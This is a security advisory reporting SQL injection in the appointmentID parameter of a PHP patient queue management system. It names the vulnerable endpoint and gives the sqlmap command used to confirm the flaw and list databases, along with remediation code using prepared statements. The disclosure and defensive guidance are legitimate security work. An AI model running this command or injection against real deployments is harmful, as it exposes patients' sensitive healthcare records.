Author: Ravi Pipalwa Date: January 28, 2026 System: PQMS — Patient Queue Management System Environment: Localhost (PHP 8.2.12, Apache 2.4.58, MySQL/MariaDB) Affected Module: Appointment Scheduling / Patient Check-In API Severity: Critical Vulnerability Type: SQL Injection (Boolean-based, Error-based, Time-based, UNION-based) Vendor Homepage: https://www.sourcecodester.com Software Link:https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html

  1. Executive Summary

During a routine security assessment of the PQMS application, a critical SQL Injection vulnerability was identified in the appointment scheduling API. The application processes user input directly in database queries without proper validation or parameterization.

This issue allows an attacker to manipulate backend SQL queries, access sensitive patient and appointment data, and potentially gain full control over the database. In a healthcare-oriented system, this risk is particularly serious due to the highly sensitive nature of patient information and compliance requirements.

The vulnerability was verified using SQLMap, which successfully detected and exploited multiple SQL injection techniques on a single parameter, clearly confirming the severity of the issue.

2. Vulnerability Overview

The vulnerability exists in the following endpoint:

/pqms/php/api_patient_schedule.php?appointmentID=APT202601299

The parameter: appointmentID (GET) is directly embedded into SQL queries without sanitization or the use of prepared statements. Because of this, attackers can inject malicious SQL payloads and alter the intended logic of the database query.

SQLMap confirmed that the parameter supports:

  • Boolean-based blind SQL injection
  • Error-based SQL injection
  • Time-based blind SQL injection
  • UNION query SQL injection

This means the database is fully injectable and can be read, modified, and potentially destroyed.

3. Affected Endpoint

GET /pqms/php/api_patient_schedule.php?appointmentID=APT202601299

The appointmentID parameter is vulnerable to SQL Injection because it is used directly in database queries without proper validation or parameterization

4. Proof of Concept (PoC)

The testing process followed a controlled and reproducible methodology:

a.) The HTTP request was captured and saved into a file .

None

b.) SQLMap was executed using:

sqlmap -r pqms-req.txt --batch --level=5 --risk=3 --dbs --threads=10

c.) SQLMap successfully :

  • Identified the backend DBMS as MySQL/MariaDB
  • Detected the injection point at appointmentID
  • Extracted database names
  • Confirmed multiple exploitation techniques

d.) Enumerated databases:

[*] cdms
[*] db_pqms
[*] information_schema
[*] mysql
[*] performance_schema
None

This confirms unauthorized access to the database structure.

5. Impact Assessment

If this vulnerability were exploited in a real-world deployment, an attacker could:

  • Access all patient and appointment records
  • Steal or modify sensitive healthcare data
  • Extract user credentials and system configuration
  • Bypass application logic
  • Delete or corrupt the database
  • Potentially escalate to server-level compromise

In healthcare systems, this could result in:

  • Severe data privacy violations
  • Regulatory non-compliance
  • Legal consequences
  • Loss of trust from patients and stakeholders
  • Operational downtime

6. Root Cause Analysis

The issue stems from several core security gaps:

  • SQL queries are constructed using raw user input
  • No use of prepared statements or parameterized queries
  • Missing input validation and format enforcement
  • Overly permissive database privileges
  • Lack of monitoring for malicious database activity

7. Security Recommendations

Immediate Remediation :

a.) Use Prepared Statements

  • Using PDO:
$stmt = $pdo->prepare("SELECT * FROM appointments WHERE appointmentID = :id");
$stmt->execute(['id' => $_GET['appointmentID']]);
  • Using MySQLi:
$stmt = $conn->prepare("SELECT * FROM appointments WHERE appointmentID = ?");
$stmt->bind_param("s", $_GET['appointmentID']);
$stmt->execute();

b.) Validate Appointment ID Format

  • If appointment IDs follow a fixed structure:
if (!preg_match('/^APT[0-9]{9}$/', $_GET['appointmentID'])) {
    die("Invalid appointment ID format.");
}
  • Apply Least-Privilege Database Access

The application database user should not have:

  • DROP
  • ALTER
  • FILE
  • SUPER privileges

Long-Term Hardening:

  • Implement centralized input validation
  • Use ORM frameworks that enforce parameter binding
  • Deploy a Web Application Firewall (WAF)
  • Enable database activity monitoring
  • Perform regular penetration tests and code audits
  • Add proper logging and alerting for abnormal queries

8. OWASP Mapping

OWASP Top 10 (2025):

  • A03: Injection
  • A05: Security Misconfiguration
  • A09: Security Logging and Monitoring Failures

SQL Injection remains one of the most dangerous and frequently exploited vulnerabilities.

9. Conclusion

The PQMS application is critically vulnerable to SQL Injection through the appointmentID parameter. The vulnerability allows attackers to fully control backend database queries and gain unauthorized access to sensitive healthcare information.

Given the potential impact, this issue should be addressed immediately before any production deployment. Fixing it will significantly improve the security posture and reliability of the system.

10. Disclosure Statement

This report is intended strictly for:

  • Authorized security testing
  • Educational and research purposes
  • Defensive security improvements

No real patient data was accessed, modified, or exposed during this assessment.